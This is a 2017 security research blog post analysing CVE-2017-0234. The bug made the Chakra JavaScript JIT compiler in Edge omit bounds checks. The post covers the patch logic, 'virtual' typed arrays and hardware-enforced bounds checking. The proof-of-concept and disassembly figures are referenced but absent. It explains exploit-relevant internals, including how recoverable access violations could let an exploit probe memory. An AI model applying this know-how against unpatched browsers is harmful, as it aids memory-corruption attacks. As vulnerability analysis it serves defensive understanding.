Check it Out: Enforcement of Bounds Checks in Native JIT Code
October 05, 2017 | Simon ZuckerbraunIn my previous post, I described how the history of JavaScript has led to the mushrooming complexity – and corresponding attack surface – of modern JavaScript engines. Judging from submissions to the Zero Day Initiative (ZDI), the JavaScript engine is the principal epicenter of browser vulnerabilities today, both in quantity and in quality. In this post, I will present details of a prime example of a vulnerability within the execution engine of Chakra, the JavaScript engine present in Microsoft Edge. This will be a deep dive, so grab a beverage!
At the 2017 Pwn2Own competition, among the victorious contestants was Tencent Security – Team Ether. On Day 1 of the competition, they delighted everyone with a remote code execution and sandbox escape exploit chain on Microsoft Edge. They gained remote code execution through a bug in Chakra, CVE-2017-0234. The proof-of-concept trigger for this bug is a tiny and innocent-looking snippet of JavaScript:
The for
loop invokes jitBlock
repeatedly, eventually prompting Chakra to invoke the JIT compiler to compile jitBlock
into native code. Next the PoC invokes jitBlock
one last time, passing an unexpected argument. Running this on a vulnerable version of ChakraCore (75bec08e
) produces an out-of-bounds write:
The out-of-bounds write occurs in the JIT-compiled code. A quick examination of the code reveals the problem:
Amazingly, the JIT compiler has produced code that is completely missing a bounds check! Why would that ever occur?
Some Background on JavaScript Execution
Before exploring the answer, some essential background information is in order. As I mentioned in the previous post, modern JIT engines cannot rely entirely on either interpreted or compiled execution. Interpreted execution is too slow for high-performance scenarios, and compiled execution is prohibitive in terms of up-front startup delay. Furthermore, it is infeasible to directly compile JavaScript into high-performing native code because of the extreme dynamic nature of the language. To solve these problems, modern JavaScript engines employ multiple modes of execution. When new script is loaded, the engine begins executing it with an interpreter, enabling rapid startup. In addition to executing the script, the interpreter is also tasked with acquiring dynamic profiling information. This includes execution counts for functions and loops, as well as information such as the types found in individual variables. At some point, the engine may determine that it is advantageous to compile some or all of the script. It makes this decision based upon the profiling counters updated during interpretation. When this occurs, the compiler makes use of the dynamic profiling information collected during interpretation to guide the compilation process. This on-the-fly compilation is also known as “JIT” or just-in-time compilation.
As an example, suppose a line of JavaScript makes an assignment to arr[0]
, and the dynamic profiling information collected during interpretation indicates that the variable arr
typically contains a Uint32Array
. If the JIT compiler is invoked, it will produce native code optimized for the assumption that arr
is a Uint32Array
. The resulting native code will first do a type check to validate the assumption. If the assumption holds true, the native code can proceed with a highly-optimized store operation. If the assumption is found to be false, execution of the native JIT code must not proceed. Instead, the JIT code branches back into the engine, which resumes executing JavaScript using the interpreter at the point that the JIT code left off. This branch is known as a “bail out”. This description is tailored for Chakra; other JavaScript engines use roughly analogous techniques.
Note that in the JIT code in Figure 3, two such “bail out” branches are seen. The first checks that arr
is an object, and the second checks that arr
is an instance of Js::TypedArray<unsigned int,0,1>
. If either check fails, a branch is made to 00000202`5e550124
. Disassembling at that address, we can see the native code that invokes the bail out mechanism:
Analyzing the Patch for CVE-2017-0234
When I began analyzing this vulnerability, Microsoft had already shipped a patch. Searching the ChakraCore repository for commit messages containing “CVE-2017-0234” immediately revealed the commit containing the patch. The patch (a1345ad4
) consists of just one change in a single file, GlobOpt.cpp
, method GlobOpt::OptArraySrc
. The class GlobOpt
is part of the JIT compiler, responsible for performing “global” optimizations. Here is the patch (orange shows removed code, yellow shows added code):
We can see immediately that the problem was that, prior to the patch, GlobOpt::OptArraySrc
would decide prematurely that is was safe to omit the upper and lower bounds checks. The patch rectifies this by adding some additional conditions.
Let’s analyze the patched version of the code and see if we can understand why it is safe to remove bounds checks when all the specified conditions hold true.
Starting with condition 1 in the figure above: The variable baseValueType
contains information about the type that is expected to appear in script variable arr
. The principal source of this information is the dynamic profiling that occurred earlier, during interpreted execution. The condition checks IsLikelyOptimizedVirtualTypedArray()
. This will return true
if variable arr
is considered at least likely to be a typed array, specifically one that is called a “virtual” typed array – we will see the significance of this a bit later.
Proceeding to condition 2: This condition determines whether any additional actions will be needed at runtime in the event that script attempts to access an index past the end of the array. If the operation is a write into an element (isProfilableStElem
), no special processing is needed when an attempted out-of-bounds access occurs. This is because out-of-bounds writes to typed arrays are to fail silently as per the ECMAScript specification (IntegerIndexedElementSet). As for element get operations, the ECMAScript specification (IntegerIndexedElementGet) prescribes that an out-of-bounds operation should return undefined
. In numerical operations, undefined
is treated as a 0, but undefined
is not interchangeable with 0 in other operations. Consequently, for an element get, if the only use of the result is as a numeric, then out-of-bounds reads can be safely regarded as 0 reads, with no other special processing.
Condition 3 checks whether we are in an asm.js function. For the purposes of this discussion, we will assume we are not executing asm.js.
In condition 4, the code looks for the array index and obtains a pointer to a corresponding Value
object. This object contains information that has been determined about the possible values that might be taken on by the index.
Finally, in condition 5, the code interrogates the idxValue
object to see what guarantees can be made about the largest and smallest possible values for the index. If it can be guaranteed that the index will never be low enough nor high enough to produce an out-of-bounds condition, the code proceeds to turn on the flags that enable elimination of bounds checks in the final JIT’ed code.
Understanding the Upper Bound Check
What is quite curious is the last line in condition 5 where the upper bound is examined. One might expect it to ensure that the upper bound for the index is less than the array length. But that is not what it does at all! Instead, it only ensures that the upper bound for the index (when multiplied by the element size, as encoded in indirScale
) is less than a fixed constant, MAX_ASMJS_ARRAYBUFFER_LENGTH
, which is defined as 2^32. Clearly, checking that the index is within the MAX_ASMJS_ARRAYBUFFER_LENGTH
limit is not enough to guarantee that the index is within the bounds of the typed array. We conclude that, even after the patch, it remains possible to cause the JIT compiler to eliminate necessary bounds checks. How is this patch effective, then?
To illustrate, consider the following script:
When compiling the script in Figure 7, the compiler recognizes that when execution reaches the array access, the script variable index is guaranteed to be between 0 and 0x40000000 (exclusive of 0x40000000). This information will be reflected in idxConstantBounds
in condition 5 above. Condition 5 will pass, and the compiler will omit bounds checks. Sure enough, the resulting JIT-compiled code will perform an out-of-bounds read when we attempt to access the invalid index 0x10000:
It appears that we have circumvented the patch, and the patch has failed. However, in this case, appearances are quite deceiving.
The key to the puzzle is found back in condition 1 in Figure 6. Condition 1 ensures that bounds check elimination will not be performed unless arr
is considered likely to be a “virtual” typed array. What is a “virtual” typed array? Whenever creating an ArrayBuffer (which is a prerequisite for creating a TypedArray, regardless of whether the ArrayBuffer is explicit in script), allocation of the buffer proceeds according to this code:
In ArrayBuffer.cpp:
In ArrayBuffer.h:
If the requested buffer length meets the conditions for a “virtual” buffer, allocation is performed by the AllocWrapper
function. This function operates very differently than a traditional allocator. It calls VirtualAlloc
to reserve memory, but the amount of memory reserved is unrelated to the amount of memory requested. Instead, it always requests 32 bits of address space (a 4GB region of virtual addresses). Then, with a second call to VirtualAlloc
, it converts part of the reserved area into accessible, committed memory. This committed region is at the beginning of the reserved region and its length is exactly the size of the requested buffer. This code path will never be invoked for requested lengths of less than 64KB. See IsValidVirtualBufferLength
for complete details.
This surprising and seemingly wasteful behavior provides a great benefit: When accessing a virtual array, JIT code can add any 32-bit displacement to the buffer base address and access the resulting address safely, without performing any bounds check. If the resulting address is past the end of the buffer, it will fall within the reserved but non-committed region. Recognizing the invalid address, the processor’s MMU will generate an access violation fault. The Chakra engine will then catch the access violation, recognize that it came from JIT code, and resume execution with the next instruction (see JavascriptFunction::ResumeForOutOfBoundsArrayRefs
). In the case of a read operation, it will set the destination register to 0 before resuming, in accordance with the ECMAScript specification (see discussion of condition 2 above). Put another way, for virtual arrays bounds checking is offloaded from software to the hardware MMU.
In the above example, after the AV occurs in the debugger, if we run !address
to examine the address that could not be written, we see that it is not a free address. Instead, it is in the MEM_RESERVE
state. This indicates that the AV is not an exploitable condition. A malicious actor would not be able to place any other allocation at that address.
We can now understand the logic of condition 5, which checks if it can be guaranteed that the index will not result in a displacement greater than or equal to 2^32. If this cannot be guaranteed, software bounds checks are needed. But if the compiler can make a guarantee based on static examination of the code that the displacement will always be less than 2^32 (as is the case for the script of Figure 7), software bounds checks can be omitted. Any out-of-bounds condition will be turned safely into an AV by the MMU.
I speculate that when the original pre-patch code was written, the author failed to notice that when the 32-bit index is scaled up by the element size, the resulting displacement may be larger than a 32-bit unsigned integer.
Ensuring an Array is Virtual: Array Type Checking
This is all very well when the buffer has been allocated using the “virtual” strategy. If the buffer has been allocated in the traditional way, however, it is unsafe to omit software bounds checks. As a result, condition 1 above warrants a closer look. The method used by condition 1 is IsLikelyOptimizedVirtualTypedArray
. This condition will be met as long as the compiler judges it to be somewhat likely that arr
is a virtual-allocated typed array – but it is by no means a guarantee. To guard against the eventuality that, at runtime, the array is not a virtual allocation, GlobOpt::OptArraySrc
inserts a type check before the array access. We saw this type check in Figure 3. It consists of an instruction that compares the array object’s vtable with the vtable of the expected type, in this case, Js::TypedArray<unsigned int,0,1>
. Note that the third template parameter, set to 1, indicates that the typed array is virtual. The code in GlobOpt::OptArraySrc
that decides whether to insert the type check is as follows:
Recall that baseValueType
carries whatever information is known about the type in variable arr
, including both definite and probabilistic knowledge. The code decides whether an array type check is necessary by invoking !baseValueType.IsObject()
. On the surface, this is puzzling. A return value of true
from the IsObject
method indicates that it is known with certainty that arr
contains a JavaScript object. Why is this sufficient to make it safe to omit the array type check?
The answer to this riddle lies in the details of the ValueType
class, of which baseValueType
is an instance. The ValueType
class has members that encode various states of definite and probabilistic knowledge. However, it does not differentiate between the state “likely to be an Object with specific type X” and the state “definitely an Object, likely of specific type X.” Instead, ValueType
contains only one “Likely” flag, and it can be either true
(indicating indefinite knowledge) or false
(indicating definite knowledge). If baseValueType
reports a specific array type, but the knowledge is only indefinite, the “Likely” flag will be true
. Even if arr
is provably an Object, IsObject
will report false
because of the presence of the Likely flag.
If IsObject
returns true, we can be assured that the Likely flag is not set, and the reported array type is known with certainty. Then it is safe to omit the array type check. As far as I can tell, this works. However, in my opinion, it is somewhat poor form. At a future point, developers may change the implementation of ValueType
, adding the ability to distinguish between the state “likely to be an Object with specific type X” and the state “definitely an Object, likely of specific type X”. In fact, in ValueType.cpp
, there is a comment indicating that such a change has been considered (see method MergeWithObject
). In that event, the call to IsObject
would no longer be a sufficient indication that the array type is known with certainty. The above code would become vulnerable unless the maintainers are fortunate enough to become aware of the need to revisit and rethink these lines buried in GlobOpt::OptArraySrc
. It would be considerably better to avoid such fragility.
Circumstances When Array Type Checking Can Be Omitted
As a follow-up, I was curious as to what circumstances could lead to baseValueType
reporting that the type of array is known definitely. After all, the types present in variables are inferred by observing execution during interpreted execution. Doesn’t it always remain a possibility that, during some subsequent execution of JIT code, the type in the variable will be different than it was during prior runs?
Investigating this question, I noticed the method ValueType::ToDefiniteObject
, which basically produces a new instance of ValueType
that is a clone of an original, except with the “Likely” flag turned off. Notably, this method is used by GlobOpt::OptArraySrc
. The logic behind this is that once GlobOpt::OptArraySrc
has inserted a check for a particular type of array, it is not necessary to perform the check again if the same array is accessed for a second time. For example, consider the following JavaScript:
For the first line, GlobOpt::OptArraySrc
will insert a type check. Then it will modify the ValueType for variable arr
to indicate that its type is now known definitely. For the second line, GlobOpt::OptArraySrc
will not insert a type check because the type of arr
is already definitely known. At runtime, execution will never reach the JIT code for the second line if arr
is not of the expected type. Rather, in that circumstance, execution of JIT code will have already ended with a bail out upon failure of the type check associated with the first line. This illustrates how GlobOpt::OptArraySrc
does not always have to emit a type check for every array access.
A Harmful Security Effect of Hardware Bounds Checking
As we have discussed, Chakra boosts performance of bounds checks on certain large arrays by offloading the checks from software to hardware. It achieves this by reserving sufficiently large regions of reserved memory so that any out-of-bounds condition will result in an access of reserved, non-committed memory, producing an access violation. Accordingly, the Chakra engine recognizes that access violations originating from JIT code are expected occurrences and continues script execution in accordance with the ECMAScript specification.
Unfortunately, this has a somewhat negative effect on the security posture of the process as a whole. In traditionally-coded processes that do not use hardware bounds checking, any access violation that arises is a clear sign of corruption. In most applications, there is no reason to attempt to recover from an access violation. Instead, applications allow the process to terminate immediately. This default behavior is positive from a security standpoint. It creates a certain natural impediment for exploitation: An exploit can be successful only if it runs to completion without causing corruption that triggers an access violation. There is no second chance.
Access violations produced within JIT-compiled code, however, do not result in process termination. In fact, Chakra even allows JavaScript execution to proceed. This gives exploitation attempts an unusual amount of leeway. Even an unreliable exploitation technique, which on a traditional process would have little chance of succeeding before shutdown occurs, will be given the opportunity to make an unlimited number of attempts on Chakra. It even may be possible for an exploit to abuse this specifically to probe and discover valid memory addresses.
Microsoft has largely mitigated this deficiency in a recent commit of ChakraCore (a0cb397d
). With this change, when deciding whether to handle an access violation, Chakra will verify that the faulting address is in fact within a MEM_RESERVE
region. It will no longer handle access violations where the faulting address is in other states. Accordingly, an access violation resulting from a failed exploitation attempt, which is typically an access to an entirely invalid (MEM_FREE
) address, will once again produce safe program termination. Hopefully this mitigation will find its way into the Windows 10 Chakra binary without undue delay.
Summary
In this post, we’ve explored some of the complexities of the Chakra JIT compiler, specifically regarding enforcement of bounds checks in native JIT code. One notable feature we’ve uncovered is that the compiler will sometimes omit bounds checking instructions entirely, instead relying on large regions of reserved address space to provide a hardware-enforced safety net to catch attempted out-of-bounds accesses. Although the approach is fundamentally sound, there is much opportunity for subtle errors, as is demonstrated by CVE-2017-0234. In truth, we have only scratched the surface of the complex logic employed by the JIT compiler and the enormous variety of scenarios it must properly handle. We expect that Chakra and other JavaScript engines will continue to be a fertile area for vulnerability research.
You can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.